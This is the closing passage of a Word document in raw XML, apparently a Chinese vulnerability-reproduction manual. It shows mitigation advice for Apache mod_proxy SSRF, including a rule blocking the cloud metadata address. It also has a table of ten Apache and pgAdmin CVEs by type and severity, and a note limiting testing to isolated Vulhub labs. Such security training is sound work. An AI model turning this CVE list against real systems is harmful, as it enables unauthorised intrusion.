        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>③ 配置</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ProxyPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>时使用明确的后端地址，避免使用通配符或过于宽泛的代理规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B4DE9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>④ 在网络层面限制Apache服务器的出站访问，禁止其访问内网敏感服务和云元数据API（169.254.169.254）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C89878" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8E0F9C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>漏洞汇总对照表</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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1727"/>
        <w:gridCol w:w="1729"/>
        <w:gridCol w:w="1727"/>
        <w:gridCol w:w="1727"/>
        <w:gridCol w:w="1726"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD3943" w14:paraId="6EEC1B01" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77F997A1" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D3AF206" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1963B7CF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="218F3BB2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EF1D7AF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>危害等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="6DE0DA0D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72D4EBAC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D621E7E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache Solr RemoteStreaming</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6838AF19" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2021-27905</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61A23E80" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSRF/任意文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2844AE56" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="1D2221B6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="661A297E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14B6C1E2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache Shiro 认证绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4238BF49" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2020-1957</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="160F389A" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>认证绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60FB20B1" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="4B4690F5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4173FCD0" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19B68C29" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache RocketMQ RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B2BB725" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-33246</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="271DCD66" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>远程命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5D9C6B" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="643CF69E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D33E9E8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BA1607D" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>pgAdmin 无授权RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78FF9B4F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2022-4223</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F6284E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>命令注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E74DC86" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="435328BF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11CDED08" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="240B1962" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache ActiveMQ 反序列化RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58D99765" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-46604</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E91F2E1" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>反序列化RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="301F7EE0" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="6859B529" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="684F0B44" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B700E6A" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache Kafka JNDI注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54E5C2C3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-25194</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D6D8CE8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>JNDI注入/RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC3607F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="007E2924" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5487DB9B" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B00B0DB" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache OfBiz 反序列化RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="648DC2CF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2023-49070</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D7765C7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>反序列化RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58885051" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="44591CFB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02FD0B45" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A60A98" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache Druid JavaScript RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF134DB" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2021-25646</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C8599AB" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>代码执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C64DC01" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="4E019AB1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29B9A486" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51E96C44" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache Log4j 反序列化RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02EB4067" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2017-5645</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16125EC7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>反序列化RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59CAA3FA" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD3943" w14:paraId="4D963EFB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E984F38" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2423E5CC" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apache HTTP Server mod_proxy SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10337D68" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2021-40438</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="225EBE66" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1729" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27BB0AB3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17FB07BD" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="00DD3943"/>
    <w:p w14:paraId="1464AE5C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本手册所有实验均基于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Vulhub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞环境进行复现，建议在隔离的实验网络中操作。漏洞研究与渗透测试必须遵守《中华人民共和国网络安全法》及相关法律法规，严禁未经授权对任何系统进行测试。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DD3943" w:rsidSect="00034616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69D1"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="00204F01"/>
    <w:rsid w:val="0025625B"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="006F5C7E"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00BB72C4"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00DD3943"/>
    <w:rsid w:val="00DF2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53A9B7"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{A067AE79-63B7-4DF8-B8D9-3D4BD42E3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eastAsia="宋体" w:hAnsi="宋体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C49446-8B7A-49A4-B540-367AA981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39</Pages>
  <Words>5385</Words>
  <Characters>30696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36009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LTSC</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-18T09:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-01T07:37:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>